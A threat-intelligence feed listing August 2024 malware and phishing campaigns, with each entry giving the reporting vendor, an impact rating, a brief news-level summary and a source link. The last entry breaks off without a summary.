Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns
2024-08-19
QWERTY_Info_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
QWERTY_Info_Stealer
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Cyfirma researchers have identified new malware called QWERTY. This malware is hosted on a Linux-based server in Germany and targets both organizations and individuals. It uses advanced techniques to avoid detection, including checking for the presence of debugging tools. It also gathers a large amount of data from the infected system, downloads additional malicious files, and sends the stolen information to a C2 server over the internet. This infostealer is able to hide itself while stealing sensitive information.
Source: https://www.cyfirma.com/research/qwerty-information-stealer/
2024-08-19
Quasar_RAT_Targeting_Italian_Banks
LOW
Intel Source:
CERT-AGID
Intel Name:
Quasar_RAT_Targeting_Italian_Banks
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
CERT-AGID researchers have discovered a large email spam campaign spreading the Quasar RAT malware. This campaign started in August and particularly targets Italy. The emails appear to be official communications from the Ministry of the Interior and use its logos to deceive victims. The malware version and C2 servers remain unchanged, but the URLs from which the malicious files are downloaded have been updated in this campaign. This malware is specifically aimed at users of certain Italian banks.
Source: https://cert-agid.gov.it/wp-content/uploads/2024/08/BlotchyQuasar_19-08-2024.json
2024-08-19
Exposing_The_Styx_Stealer_Malware
LOW
Intel Source:
Checkpoint
Intel Name:
Exposing_The_Styx_Stealer_Malware
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Researchers from Check Point Research have discovered that the Styx Stealer malware can steal browser data, Telegram and Discord chats, and even cryptocurrency. The developer made a mistake while debugging the malware, resulting in data leakage from the developer's own machine. This enabled CPR to collect vital information, such as client details, profits, nicknames, phone numbers, and email addresses, as well as comparable data on the individual behind the Agent Tesla campaign.
Source: https://research.checkpoint.com/2024/unmasking-styx-stealer-how-a-hackers-slip-led-to-an-intelligence-treasure-trove/
2024-08-19
Stealthy_Python_Script_Execution_via_bat_File
LOW
Intel Source:
ISC.SANS
Intel Name:
Stealthy_Python_Script_Execution_via_bat_File
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Researchers from ISC SANS have discovered a small .bat file named 3650.bat, which seemed harmless and had a low VirusTotal detection score. Initially, a downloaded PowerShell script retrieves and unpacks multiple ZIP archives. It then downloads an entire Python environment, including all of the libraries required to run the next stage. The next step is to download and run a Python script. The first PowerShell script is simple, but the Python script is far more complex and difficult to examine.
Source: https://isc.sans.edu/diary/rss/31182
2024-08-19
Xeon_Sender_Tool_Targets_SaaS_Credentials
LOW
Intel Source:
Sentinel Labs
Intel Name:
Xeon_Sender_Tool_Targets_SaaS_Credentials
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Researchers from Sentinel Labs have found the cloud-based attack tool Xeon Sender, which is designed to assist SMS spam and phishing campaigns. This tool gives attackers a simple command-line interface to communicate with targeted service provider backends via APIs, allowing them to launch bulk SMS spam campaigns with minimal effort. Xeon enables attackers to send messages via several software-as-a-service (SaaS) providers with valid credentials.
Source: https://www.sentinelone.com/labs/xeon-sender-sms-spam-shipping-multi-tool-targeting-saas-credentials/
2024-08-19
SPECTR_and_FIRMACHAGEENT_Spread_via_Phishing
LOW
Intel Source:
CERT-UA
Intel Name:
SPECTR_and_FIRMACHAGEENT_Spread_via_Phishing
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Researchers from CERT-UA have discovered phishing emails with the subject line "prisoners of war" containing a malicious ZIP file ("spysok_kursk.zip"). This ZIP archive contains a CHM file that uses JavaScript to launch a PowerShell script. This script downloads both the SPECTR malware, which steals documents, screenshots, and browser data, and the FIRMACHAGEENT malware, which uploads the stolen data to a server.
Source: https://cert.gov.ua/article/6280422
2024-08-19
UULoader_A_New_Malware_Installer
LOW
Intel Source:
Cyberint
Intel Name:
UULoader_A_New_Malware_Installer
Date of Scan:
2024-08-19
Impact:
LOW
Summary:
Cyberint researchers have discovered new malware called UULoader that targets Korean- and Chinese-speaking users by pretending to be legitimate apps or updates. The malware evades analysis by stripping key file information, making it hard for security tools to detect. When the malicious installer is run, UULoader creates a hidden folder called Microsoft Thunder on the infected computer, stores hidden files there, and runs a script to prevent Windows Defender from scanning it. This allows the malware to stay hidden while taking control of the system.
Source: https://cyberint.com/blog/research/meet-uuloader-an-emerging-and-evasive-malicious-installer/
2024-08-16
Gafgyt_Malware_Exploiting_GPU_and_CNE
MEDIUM
Intel Source:
Aquasec
Intel Name:
Gafgyt_Malware_Exploiting_GPU_and_CNE
Date of Scan:
2024-08-16
Impact:
MEDIUM
Summary:
Aqua Nautilus researchers have discovered a new variant of Gafgyt malware that uses the computational power of GPUs and cloud-native environments to grow its botnet and mine cryptocurrency. The variant mainly attacks machines with weak SSH passwords, and it runs two binaries directly from memory: one for spreading the botnet and another for cryptomining.
Source: https://www.aquasec.com/blog/gafgyt-malware-variant-exploits-gpu-power-and-cloud-native-environments/
2024-08-16
Russia_Linked_SpearPhishing_Campaigns
MEDIUM
Intel Source:
Accessnow
Intel Name:
Russia_Linked_SpearPhishing_Campaigns
Date of Scan:
2024-08-16
Impact:
MEDIUM
Summary:
Accessnow has uncovered two spear-phishing campaigns targeting Russian and Belarusian NGOs, independent media, international NGOs, and a former U.S. ambassador. One campaign is attributed to the Russia-linked group COLDRIVER (also known as STAR BLIZZARD), while the other, possibly linked to the Russian regime, has been dubbed "COLDWASTREL." These highly personalized phishing attacks involved emails from compromised or impersonated accounts with links to fake login pages designed to steal credentials. Although some targets were successfully deceived, many remained unharmed.
Source: https://www.accessnow.org/russian-phishing-campaigns/
2024-08-16
Env_File_Extortion
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Env_File_Extortion
Date of Scan:
2024-08-16
Impact:
MEDIUM
Summary:
Researchers from Unit 42 have uncovered a large-scale extortion operation targeting cloud environments by exploiting exposed environment variable files (.env files) that contained sensitive credentials for various applications. The attackers set up their infrastructure within victims' Amazon Web Services (AWS) environments and scanned over 230 million unique targets, compromising 110,000 domains and extracting over 90,000 unique variables from the .env files.
Source: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
2024-08-16
Ailurophile_Stealer
LOW
Intel Source:
GData
Intel Name:
Ailurophile_Stealer
Date of Scan:
2024-08-16
Impact:
LOW
Summary:
Researchers at GData have discovered malware called Ailurophile Stealer. This malware is written in PHP and likely originates from Vietnam. It is sold through a subscription service on its own website that allows buyers to customize and create their own versions. The malware targets sensitive data from web browsers such as passwords, cookies, browsing history, and cryptocurrency wallet information. It also steals specific files based on keywords, extensions, or directories. The malware operates within a virtual environment that extracts the PHP interpreter and other files directly into memory, making it hard to detect.
Source: https://www.gdatasoftware.com/blog/2024/08/38005-ailurophile-infostealer
2024-08-16
COLDRIVER_Campaign
MEDIUM
+
Intel Source:
Citizen Lab
Intel Name:
COLDRIVER_Campaign
Date of Scan:
2024-08-16
Impact:
MEDIUM
Summary:
Citizen Lab researchers have observed a sophisticated spear phishing campaign by the COLDRIVER threat actor, which is attributed to the Russian Federal Security Service (FSB). It is focused on civil society members, including Russian opposition figures, NGO employees and former officials in the US and Europe, using highly customized and persuasive social engineering aimed at gaining access to online accounts.
Source: https://citizenlab.ca/2024/08/sophisticated-phishing-targets-russias-perceived-enemies-around-the-globe/
2024-08-16
D3Fack_Malware_Loader
LOW
+
Intel Source:
Esentire
Intel Name:
D3Fack_Malware_Loader
Date of Scan:
2024-08-16
Impact:
LOW
Summary:
Researchers at eSentire have discovered a malware called D3F@ck Loader, which is developed by an individual using the alias Sergei Panteleevich, a name borrowed from a notorious Russian fraudster. Sergei is active on Telegram and hacking forums. This loader is designed to deliver other malicious software like Raccoon Stealer and MetaStealer. It first appeared in February 2024. The malware uses the Inno Setup installer, which can be manipulated to run malicious scripts, making it effective at spreading various types of malware and maintaining persistence on infected systems.
Source: https://www.esentire.com/blog/exploring-the-d3f-ck-malware-as-a-service-loader
2024-08-16
Collaborative_Action_Against_FIN7
LOW
+
Intel Source:
TeamCymru
Intel Name:
Collaborative_Action_Against_FIN7
Date of Scan:
2024-08-16
Impact:
LOW
Summary:
Researchers at Silent Push, Stark, and Team Cymru have made a collaborative effort to tackle the persistent threat posed by FIN7, a financially motivated cybercrime group active for over a decade. Despite previous interruptions, FIN7 remains operational: recent Silent Push research identified almost four thousand domains either linked to or imitating FIN7. Notably, most of these domains were hosted on infrastructure assigned to Stark companies. The latest analysis revealed two clusters of suspected FIN7 activity associated with IP addresses from Post Ltd (Russia) and Smart Ape (Estonia), along with 25 IP addresses belonging to Stark that host domains related to FIN7.
Source: https://www.team-cymru.com/post/fin7-the-truth-doesn-t-need-to-be-so-stark
2024-08-16
WACC_User_Targeted_by_Havoc_Malware
LOW
+
Intel Source:
Cyble
Intel Name:
WACC_User_Targeted_by_Havoc_Malware
Date of Scan:
2024-08-16
Impact:
LOW
Summary:
CRIL researchers discovered a fake website that looks very similar to the official site of the World Agricultural Cycling Competition (WACC). The WACC competition is an event held in France that brings together agriculture and sports. This fake site was created in July 2024, right after the real event ended in June. The site includes a "PHOTO" section that entices visitors with the promise of event photos. However, when users download the ZIP file that supposedly contains these photos, they get a set of malicious shortcut files that start a process that installs Havoc C2 malware. This malware tries to communicate with an Azure Front Door, which likely redirects traffic to the attacker's main C2 for further malicious activities.
Source: https://cyble.com/blog/world-agricultural-cycling-competition-wacc-participants-targeted-for-havoc-c2-dissemination/
2024-08-16
Unmasking_Mad_Liberator_Ransomware
LOW
+
Intel Source:
sophos
Intel Name:
Unmasking_Mad_Liberator_Ransomware
Date of Scan:
2024-08-16
Impact:
LOW
Summary:
Researchers from Sophos have discovered that the "Mad Liberator" ransomware group leverages social engineering techniques to obtain access. This group focuses on users of remote access programs such as AnyDesk, which are widely used by IT teams to manage remote equipment. Sophos found no prior contact between the attackers and their victims before the victims received unsolicited AnyDesk connection requests. Interestingly, the targeted users were not well-known or visible to the public, and there was no evident basis for their selection.
Source: https://news.sophos.com/en-us/2024/08/13/dont-get-mad-get-wise/
2024-08-15
APT42_Update
MEDIUM
+
Intel Source:
Google Mandiant
Intel Name:
APT42_Update
Date of Scan:
2024-08-15
Impact:
MEDIUM
Summary:
Google’s Threat Analysis Group (TAG) has shared details on APT42, an Iranian government-backed threat actor linked to the Islamic Revolutionary Guard Corps (IRGC), and their phishing campaigns targeting Israel and the U.S. In 2024, APT42 focused heavily on credential phishing attacks aimed at high-profile individuals, including diplomats, military officials, academics, and political figures, particularly those associated with the U.S. presidential election and Israel’s defense sector. They use social engineering techniques and phishing kits to harvest credentials through platforms like Google, Dropbox, and OneDrive. TAG has actively disrupted APT42’s activities by removing malicious infrastructure and alerting affected users. As tensions between Iran and Israel continue, APT42's phishing efforts are expected to escalate.
Source: https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us/
2024-08-15
Tusk_Infostealer_Campaign
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Tusk_Infostealer_Campaign
Date of Scan:
2024-08-15
Impact:
MEDIUM
Summary:
Kaspersky has uncovered a complex, multi-phase cybercriminal campaign, dubbed "Tusk", orchestrated by Russian-speaking threat actors. The campaign, involving both active and dormant sub-campaigns, mimics legitimate projects by modifying names and branding, primarily using Dropbox to host malware, such as infostealers like Danabot and StealC. The attackers leverage phishing to gather sensitive information, such as cryptocurrency wallet credentials, which they exploit for financial gain. Three active sub-campaigns were analyzed: TidyMe, RuneOnlineWorld, and Voico, each employing advanced malware-delivery mechanisms, including anti-analysis techniques, and focusing on both Windows and macOS platforms. These campaigns emphasize the actors' ability to evolve tactics rapidly, evidenced by the discovery of 16 inactive sub-campaigns, suggesting future attacks.
Source: https://securelist.com/tusk-infostealers-campaign/113367/
2024-08-15
Cyclops_Malware_Platform
MEDIUM
+
Intel Source:
Harfang Lab
Intel Name:
Cyclops_Malware_Platform
Date of Scan:
2024-08-15
Impact:
MEDIUM
Summary:
Cyclops is a newly identified malware platform written in Go, believed to be a successor to the BellaCiao malware, and attributed to the "Charming Kitten" group (APT35). Cyclops, active since December 2023, allows its operators to execute arbitrary commands, manipulate file systems, and pivot within infected networks through a REST API controlled via an SSH tunnel. It was likely deployed in the Middle East in 2024, possibly targeting servers vulnerable to exploitation. With notable overlaps in tactics, techniques, and procedures (TTPs) with BellaCiao, and associations with Iranian interests, Cyclops appears to reflect Charming Kitten’s evolving capabilities, though its limited detection suggests it may still be in the early stages of use.
Source: https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/
2024-08-15
EDRKillShifter_Utility
MEDIUM
+
Intel Source:
Sophos
Intel Name:
EDRKillShifter_Utility
Date of Scan:
2024-08-15
Impact:
MEDIUM
Summary:
Sophos recently uncovered a new tool, named "EDRKillShifter," used by threat actors attempting to disable endpoint detection and response (EDR) systems during a ransomware attack involving RansomHub. While the attack failed, analysis revealed that EDRKillShifter is a loader that exploits vulnerable drivers to disable security software. The tool requires a password to decrypt embedded payloads, which then drop and exploit drivers to gain system privileges and terminate security processes. EDRKillShifter is part of a broader trend of EDR killers and uses techniques such as self-modifying code and Go-based obfuscation to evade detection. The final payloads vary by incident, and the tool may have been acquired from dark net marketplaces.
Source: https://news.sophos.com/en-us/2024/08/14/edr-kill-shifter/
2024-08-15
New_ValleyRAT_Campaign
LOW
+
Intel Source:
FortiGuard Labs
Intel Name:
New_ValleyRAT_Campaign
Date of Scan:
2024-08-15
Impact:
LOW
Summary:
FortiGuard Labs has uncovered an ongoing ValleyRAT malware campaign targeting Chinese-speaking users, primarily focusing on Windows systems. Historically aimed at sectors such as e-commerce and finance, ValleyRAT employs multi-stage attacks using shellcode to evade detection by executing components directly in memory, minimizing its file footprint. The campaign involves techniques like masquerading as legitimate financial documents and employing sandbox evasion tactics. The malware uses a beaconing module to connect with a command and control (C2) server, allowing attackers to load additional components, gain administrator privileges, and monitor the victim’s activities. It also targets specific Chinese antivirus software to disable defenses.
Source: https://www.fortinet.com/blog/threat-research/valleyrat-campaign-targeting-chinese-speakers
2024-08-15
Malicious_Google_Search_Ads
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Malicious_Google_Search_Ads
Date of Scan:
2024-08-15
Impact:
LOW
Summary:
Malwarebytes has uncovered a new scam campaign in which cybercriminals are using malicious search ads to impersonate multiple Google products, including Google Authenticator and Google Maps, to distribute malware. The attackers redirect victims to a fake Google homepage via Google's Looker Studio, which is misused to display an image designed to resemble the real Google search page. When victims interact with this fake page, they are redirected to a tech support scam site that locks their browser and displays fake Microsoft or Apple alerts, pressuring them into calling a number for assistance. The scammers then attempt to defraud victims by persuading them to buy gift cards or log into their bank accounts. This campaign is particularly dangerous as the scammers rotate malicious URLs through Microsoft Azure’s infrastructure, making conventional blocking efforts difficult.
Source: https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads
2024-08-15
Banshee_Infostealer
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
Banshee_Infostealer
Date of Scan:
2024-08-15
Impact:
LOW
Summary:
BANSHEE Stealer is a new macOS malware developed by Russian threat actors targeting both x86_64 and ARM64 architectures. This high-priced malware, at $3,000 per month, is capable of stealing extensive system data, browser credentials, and cryptocurrency wallets, with a focus on macOS systems. It employs basic techniques for anti-debugging and virtual machine detection, collects files from various locations, and even uses phishing tactics to steal user passwords. BANSHEE Stealer targets nine popular browsers, around 100 browser extensions, and several cryptocurrency wallets.
Source: https://www.elastic.co/security-labs/beyond-the-wail
2024-08-14
Similarities_Between_Tokyo_And_Paris_Olympics
LOW
+
Intel Source:
PaloAlto
Intel Name:
Similarities_Between_Tokyo_And_Paris_Olympics
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
Researchers at Palo Alto have discovered that scam and phishing domains linked to the Tokyo 2021 Summer Olympics are also connected to the Paris 2024 Summer Olympics. This suggests that the same threat actors are targeting Olympic events by reusing domains and infrastructure. Interestingly, the 2020 Olympics, which were delayed to 2021 because of the COVID-19 pandemic, led to the creation of domains with 2021 in their names. The analysis shows that these malicious domains are using the same IP addresses across different Olympic years.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-12-Olympic-themed-domains-similar-infrastructure-2020-and-2024.txt
2024-08-14
Malicious_Activity_Intensify_for_2024_US_Elections
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
Malicious_Activity_Intensify_for_2024_US_Elections
Date of Scan:
2024-08-14
Impact:
MEDIUM
Summary:
The forthcoming US 2024 elections are being shadowed by intensified influence operations from external and internal actors. Russia, China, and Iran each use their own techniques to manipulate election processes, such as exploiting social media and posing as America-based news outlets. Meanwhile, Russia’s Doppelganger network and China’s Empire Dragon are trying to shape public opinion through these platforms by amplifying controversies, though with only limited results so far.
Source: https://go.recordedfuture.com/hubfs/reports/ta-2024-0813.pdf
2024-08-14
Analysis_of_Malware_Delivered_via_MSI_Package
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Analysis_of_Malware_Delivered_via_MSI_Package
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
Researchers from ISC SANS have observed numerous malware samples delivered via an MSI package. During their analysis, they found that the sample had a low detection score on VirusTotal. However, when they attempted to install the package in their sandbox environment, they received an error message: "This package can only be run from a bootstrapper." This error usually occurs while uninstalling or updating a package that contains an EXE file, particularly in multilingual products that display a language selection window. It is a known problem, frequently caused by separate language installations with distinct Product Codes.
Source: https://isc.sans.edu/diary/rss/31168
2024-08-14
A_Deep_Dive_into_Twelve_Group
LOW
+
Intel Source:
Securelist
Intel Name:
A_Deep_Dive_into_Twelve_Group
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
Researchers at Securelist have identified a group called Twelve which formed in 2023 during the Russian-Ukrainian conflict. This group targets Russian state-owned companies with the aim of causing significant harm by encrypting and deleting data. Twelve uses publicly available tools instead of creating their own. They perform reconnaissance to find vulnerabilities, then use tools like ngrok, Cobalt Strike, and PowerShell to infiltrate and maintain access to systems. Twelve isn't interested in ransom. They prefer to encrypt data and then use wipers to make recovery impossible. Their motive appears to be causing harm rather than achieving financial gain.
Source: https://securelist.ru/twelve-group-unified-kill-chain/110128/
2024-08-14
Cryptocurrency_Lures_and_Pupy_RAT
LOW
+
Intel Source:
Cyble
Intel Name:
Cryptocurrency_Lures_and_Pupy_RAT
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
CRIL researchers have uncovered a campaign in which a threat actor called UTG-Q-010 is targeting cryptocurrency enthusiasts and HR departments using a Windows shortcut (LNK) file in phishing emails. This group is believed to be from East Asia and is primarily involved in financially motivated attacks. They use social engineering tactics, such as pretending to offer job resumes or a fictional cryptocurrency event called Michelin Night, to trick victims into opening malicious attachments. Their goal is to deploy a powerful remote access tool called Pupy RAT to control the compromised system.
Source: https://cyble.com/blog/analysing-the-utg-q-010-campaign/
2024-08-14
North_Korean_Malware_Disguised_as_CHM_Document
LOW
+
Intel Source:
The Dreaming Bluebird
Intel Name:
North_Korean_Malware_Disguised_as_CHM_Document
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
A recent security alert highlights a malware attack involving a CHM file titled "240903-National Assembly (regular) 1st Plenary Session Agenda (Settlement of Accounts, Proposal of Agenda, Report on Current Issues) 2024.8.11," created by the North Korean hacking group Kimsuky. The file, disguised as a National Assembly agenda document, targets South Korean National Assembly members and aides. Once the file is opened, it automatically executes PowerShell commands, and the malware is undetected by most antivirus products.
Source: https://wezard4u.tistory.com/429252
2024-08-14
Indian_Banks_Targeted_by_RansomEXX
LOW
+
Intel Source:
CloudSek and Juniper
Intel Name:
Indian_Banks_Targeted_by_RansomEXX
Date of Scan:
2024-08-14
Impact:
LOW
Summary:
CloudSek and Juniper researchers have identified a ransomware attack that is disrupting the Indian banking ecosystem. This attack has targeted Brontoo Technology Solutions, a joint venture between Tata Consultancy Services (TCS) and the State Bank of India (SBI). The group behind this attack is RansomEXX, active since 2018 and known for targeting government organizations, banks and other sectors. The attack starts with a misconfigured Jenkins server, where the attackers exploit a vulnerability known as CVE-2024-23897. This vulnerability allows attackers to gain unauthorized access, leading to the ransomware attack that severely impacts banking operations.
Source: https://blogs.juniper.net/en-us/threat-research/cve-2024-23897-enabled-ransomware-attack-on-indian-banks https://www.cloudsek.com/blog/major-payment-disruption-ransomware-strikes-indian-banking-infrastructure
2024-08-13
Allarich_Ransomware
LOW
+
Intel Source:
LinkedIn
Intel Name:
Allarich_Ransomware
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
A new ransomware called Allarich has emerged in the ransomware landscape. This ransomware encrypts files by adding the Allarich extension to them and changes the desktop wallpaper.
Source: https://www.linkedin.com/feed/update/urn:li:activity:7229102181918896128/
2024-08-13
New_Malware_Trends
LOW
+
Intel Source:
ReliaQuest
Intel Name:
New_Malware_Trends
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
Researchers from ReliaQuest have observed that SocGholish, GootLoader, and Raspberry Robin are among the most common malware found in critical security incidents. These loaders are increasingly leveraging scripting languages like Python to deliver additional malware, such as ransomware, which improves evasion and persistence. This shift reflects a larger trend away from easily identifiable executables and PowerShell scripts and toward stealthier techniques.
Source: https://www.reliaquest.com/blog/common-malware-loaders/
2024-08-13
APT_Groups_Targeting_Russian_Government
MEDIUM
+
Intel Source:
Medium (jazkiller2432)
Intel Name:
APT_Groups_Targeting_Russian_Government
Date of Scan:
2024-08-13
Impact:
MEDIUM
Summary:
The analysis describes a series of sophisticated malware campaigns by state-sponsored APT groups targeting Russian government agencies and IT firms. These campaigns use complex malware such as the CMoon worm, which spreads via USB drives and executes using CMD.EXE, and the GrewApacha backdoor, which takes advantage of DLL side-loading to maintain persistence. The attacks involve spear-phishing, exploitation of system vulnerabilities, and abuse of cloud services for command and control infrastructure. The malware supports data exfiltration, remote control, and evasion techniques, among other capabilities, posing a serious threat to the security of the targeted systems.
Source: https://medium.com/@jazkiller2432/state-sponsored-apt-groups-target-russian-government-and-it-firms-with-sophisticated-malware-3a8df40cb0e2
2024-08-13
Lock_System_Ransomware
LOW
+
Intel Source:
Linkedin
Intel Name:
Lock_System_Ransomware
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
A new ransomware strain named Lock System has recently surfaced in the ransomware landscape. This ransomware encrypts the victim's files and demands a ransom of 1 Bitcoin (BTC) for their release.
Source: https://www.linkedin.com/posts/chethan-mj-5a52bb254_cti-cybersecurity-security-activity-7227565615895470080-ivRF/?utm_source=share&utm_medium=member_ios
2024-08-13
The_Examination_of_Play_Ransomware
LOW
+
Intel Source:
Netskope
Intel Name:
The_Examination_of_Play_Ransomware
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
Netskope researchers have analyzed the Play ransomware, also known as PlayCrypt, which emerged in June 2022 and has affected the healthcare and telecommunication sectors in Latin America, Europe, and North America. The ransomware gains network access via compromised accounts or by exploiting vulnerabilities, then uses post-exploitation tools such as BloodHound, PsExec, Mimikatz, and AdFind. Its anti-analysis techniques include return-oriented programming (ROP), junk code insertion, Structured Exception Handling (SEH) abuse, string obfuscation, and API hashing, which make it hard to detect and analyze.
Source: https://www.netskope.com/blog/replay-revisiting-play-ransomware-anti-analysis-techniques
2024-08-13
UAC_0198_targets_government_entities_of_Ukraine
LOW
+
Intel Source:
CERT-UA
Intel Name:
UAC_0198_targets_government_entities_of_Ukraine
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
Researchers at CERT-UA have discovered a phishing campaign in which UAC-0198 is distributing emails purporting to come from the Security Service of Ukraine, with a link to download a file named Documents.zip. However, instead of legitimate documents, this link downloads an MSI file, and when the user opens this file it installs malware called ANONVNC, which enables unauthorized access to the infected system. Over 100 computers, including those within the Ukrainian government and local authorities, have been affected by this malware.
Source: https://cert.gov.ua/article/6280345
2024-08-13
AnyDesk_Campaign_Targets_UK_Banks
LOW
+
Intel Source:
Silent Push
Intel Name:
AnyDesk_Campaign_Targets_UK_Banks
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
Silent Push researchers have uncovered a campaign where attackers are using spoofed websites, social engineering, and phishing tactics to trick Windows and macOS users into downloading a copy of the AnyDesk remote access software. Once the threat actor has access to a victim’s machine, they can perform various attacks such as stealing data, committing financial fraud and accessing bank accounts. The campaign targets brands like UK banks (HSBC, Natwest, Lloyds, Santander, Virgin Money), antivirus companies like Avast and cryptocurrency wallet provider Ledger. These fake sites closely resemble legitimate brand websites to make the scam more convincing.
Source: https://www.silentpush.com/blog/anydesk/
2024-08-13
Social_Engineering_Campaign
LOW
+
Intel Source:
Rapid7
Intel Name:
Social_Engineering_Campaign
Date of Scan:
2024-08-13
Impact:
LOW
Summary:
Rapid7 researchers have uncovered a social engineering campaign where attackers use email bombs and follow-up phone calls, often through MS Teams, to trick users into downloading AnyDesk, a remote access tool that allows them to take control of the victim's machine. Once the attacker gains access to the victim’s machine, they use this access to upload and execute payloads to exfiltrate data. They also use a fake program called AntiSpam.exe to trick users into entering their credentials for future use. Additionally, the attackers deploy various payloads, including SystemBC malware and other tools, to establish connections with their C2 servers and escalate privileges within the system.
Source: https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-campaign-refreshes-payloads/
2024-08-12
EastWind_Campaign
MEDIUM
+
Intel Source:
Securelist
Intel Name:
EastWind_Campaign
Date of Scan:
2024-08-12
Impact:
MEDIUM
Summary:
Securelist researchers have discovered an ongoing campaign of targeted cyberattacks on dozens of machines belonging to Russian government organizations and IT companies. The attacks are initiated through phishing emails containing malicious shortcut files. Once clicked, these shortcuts install malware that communicates with the attackers via Dropbox, allowing them to deploy additional Trojans and tools used by the APT31 group, including an updated CloudSorcerer backdoor. The researchers have named this campaign EastWind.
Source: https://securelist.ru/eastwind-apt-campaign/110020/
2024-08-12
Hackers_Leveraging_Sliver_PoshC2_and_Batch_Scripts
MEDIUM
+
Intel Source:
The DFIR Report
Intel Name:
Hackers_Leveraging_Sliver_PoshC2_and_Batch_Scripts
Date of Scan:
2024-08-12
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have examined an open directory associated with IP address 94[.]198[.]53[.]143, first identified on December 10, 2023. Initially flagged for PoshC2 command-and-control activity since September 21, 2023, this infrastructure has been intermittently active, with the most recent activity on August 11, 2024. The attacker used a variety of scripts and malware to attack both Windows and Linux systems, including batch scripts for deleting backups, disabling security features, and removing logs. Ngrok and SystemBC malware were also used in the process.
Source: https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#iocs
2024-08-12
Exposing_a_New_Polymorphic_Malware_Campaign
LOW
+
Intel Source:
ReasonLabs
Intel Name:
Exposing_a_New_Polymorphic_Malware_Campaign
Date of Scan:
2024-08-12
Impact:
LOW
Summary:
Researchers from the ReasonLabs Research Team have observed a large malware operation that installs unwanted extensions on devices. The trojanized software includes everything from simple adware that hijacks searches to more complex scripts that may collect personal information and execute malicious commands.
Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign
2024-08-12
Fog_Ransomware
LOW
+
Intel Source:
Linkedin
Intel Name:
Fog_Ransomware
Date of Scan:
2024-08-12
Impact:
LOW
Summary:
Fog Ransomware, first detected in June 2024, is a Visual C++ coded malware targeting Windows systems. It primarily affects the education sector, with the U.S. being the most impacted country, though other industries and countries are also affected. Fog encrypts files, appending them with the extensions .fog and .flocked. The ransomware is linked to various other ransomware families and uses tools and techniques common among these groups, such as SharpShares for network discovery and Veeam-Get-Creds.ps1 for credential theft. The Dark Web site used by the attackers is built with Astro, a content-driven web framework. While a list of victims is known, their data has not yet appeared on the site.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_fog-ransomware-malware-activity-7227574275925295104-XbBh/?utm_source=share&utm_medium=member_ios
2024-08-09
PureHVNC_Deployed_in_Multi_Malware_Attack
LOW
+
Intel Source:
Fortinet
Intel Name:
PureHVNC_Deployed_in_Multi_Malware_Attack
Date of Scan:
2024-08-09
Impact:
LOW
Summary:
FortiGuard Labs researchers have discovered a sophisticated attack that uses a variety of evasion techniques. The attack begins with a phishing email that tricks victims into downloading a malicious attachment. This attachment initiates the installation of multiple malware programs, including VenomRAT, XWorm, AsyncRAT, and PureHVNC. To evade detection, the attackers use advanced tactics such as Python-based obfuscators and specialized tools.
Source: https://www.fortinet.com/blog/threat-research/purehvnc-deployed-via-python-multi-stage-loader
2024-08-09
Ande_Loader_Causes_0bj3ctivity_Stealer_Infection
LOW
+
Intel Source:
Esentire
Intel Name:
Ande_Loader_Causes_0bj3ctivity_Stealer_Infection
Date of Scan:
2024-08-09
Impact:
LOW
Summary:
Researchers at eSentire have discovered a phishing attack that led to an infection with the 0bj3ctivity Stealer malware. The incident began when a user clicked on a malicious Discord CDN link, resulting in the download of a JavaScript file called Enquiry-Dubai.js. This file was created to retrieve and run additional malicious payloads, including the Ande Loader and the 0bj3ctivity Stealer.
Source: https://www.esentire.com/blog/ande-loader-leads-to-0bj3ctivity-stealer-infection
2024-08-09
Earth_Baku_Targets_Europe_and_MEA
LOW
+
Intel Source:
Trend Micro
Intel Name:
Earth_Baku_Targets_Europe_and_MEA
Date of Scan:
2024-08-09
Impact:
LOW
Summary:
Researchers from Trend Micro have revealed that the current 'Earth Baku' campaign has expanded its activities beyond the Indo-Pacific area to Europe, the Middle East, and Africa, targeting nations such as Italy, Germany, the UAE, and Qatar, with suspected threat activity in Georgia and Romania. The group uses public-facing applications, such as IIS servers, as entry points and deploys complex malware toolkits such as the Godzilla webshell, StealthVector, StealthReacher, and SneakCross.
Source: https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html
2024-08-09
Kimsuky_Targets_University_Researchers
LOW
+
Intel Source:
Resilience
Intel Name:
Kimsuky_Targets_University_Researchers
Date of Scan:
2024-08-09
Impact:
LOW
Summary:
